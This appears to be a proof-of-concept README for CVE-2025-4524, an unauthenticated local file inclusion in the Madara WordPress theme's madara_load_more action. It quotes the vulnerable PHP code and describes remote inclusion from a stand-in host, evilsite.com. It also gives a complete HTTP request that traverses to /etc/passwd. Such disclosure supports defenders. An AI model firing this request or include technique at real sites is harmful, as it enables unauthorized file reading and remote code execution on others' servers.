来源

关联漏洞

描述

CVE-2025-4524 - Unauthenticated madara-core Wordpress theme LFI

介绍

# CVE-2025-4524 - Unauthenticated madara-core Wordpress theme LFI

[WordFence link](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/madara/madara-responsive-and-modern-wordpress-theme-for-manga-sites-222-unauthenticated-local-file-inclusion)

## Description
A vulnerability lies in `madara`'s `madara_load_more` action, where a `template` parameter is arbitrary data from the user and passed to PHP's `include` function.

## Vulnerability
A vulnerability lies in `madara`'s `madara_load_more` action, where a `template` parameter is arbitrary data from the user and passed to PHP's `include` function.


The vulnerable code is as follows:
```php
add_action( 'wp_ajax_madara_load_more', array( $this, 'ajax_load_next_page' ) );
add_action( 'wp_ajax_nopriv_madara_load_more', array( $this, 'ajax_load_next_page' ) );

...

function ajax_load_next_page() {
  ...
  
  if ( $query->have_posts() ) {
    while ( $query->have_posts() ) {
      $query->the_post();
      $madara_loop_index ++;
      set_query_var( 'madara_loop_index', $madara_loop_index );
      
      if ( $madara_loop_index < $posts_per_page + 1 ) {
        if ( ( strpos( $template, 'plugins' ) !== false ) ) {
          include( $template ); // we are in wp-content\themes\madara\app\{plugins} VULN
        } else {
          //$post_format = get_post_format() ? get_post_format : '';
          get_template_part( $template, get_post_format() );
        }
      }
    }

    if ( $query->post_count <= $posts_per_page ) {
      // there are no more posts
      // print a flag to detect
      echo '<div class="invi no-posts"><!-- --></div>';
    }
  } else {
    // no posts found
  }

  /* Restore original Post Data */
  wp_reset_postdata();
  die( '' );
}
```

On each successful query of `madara_load_more`, the template passed in by `template` will be rendered with the result. If the string `plugins` is seen in the `template` parameter, the input is passed as is to `include`, while if it is not present, Wordpress will find the template.

We can use this to query arbitrary files, either with `https://evilsite.com/plugins/evil.php` if `allow_url_include` is enabled, or via a path traversal. Since the current directory when doing this actions is ` wp-content/themes/madara/app/`, and a `plugins` directory exists, we can include something like `plugins/../../../../../wp-content/uploads/evil.png`.

## Exploit
This can be exploited depending on `allow_url_include`.

If it is enabled, a malicious actor can setup an HTTP server that replies with a malicious PHP script upon receptionof a request with the string `plugins`.

If it is disabled, a malicious actor can upload a file containing a PHP string (Image EXIF metadata, image pixel data, etc.) through other means on the Wordpress instance and include the file. This way, the image data will not be interpreted as PHP and only the PHP between tags will be. 

This can lead to RCE or LFI.


![image](https://github.com/user-attachments/assets/fb69c8c5-570a-41c3-8ecc-b53d07f0c140)

```http
POST /wp-admin/admin-ajax.php HTTP/2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 490

action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail
```

文件快照

 [4.0K]  /data/pocs/4b5f868e32c51f2555ad5bf900aecc261f5e71fc
├── [4.4K]  poc.py
└── [3.8K]  README.md

0 directories, 2 files

备注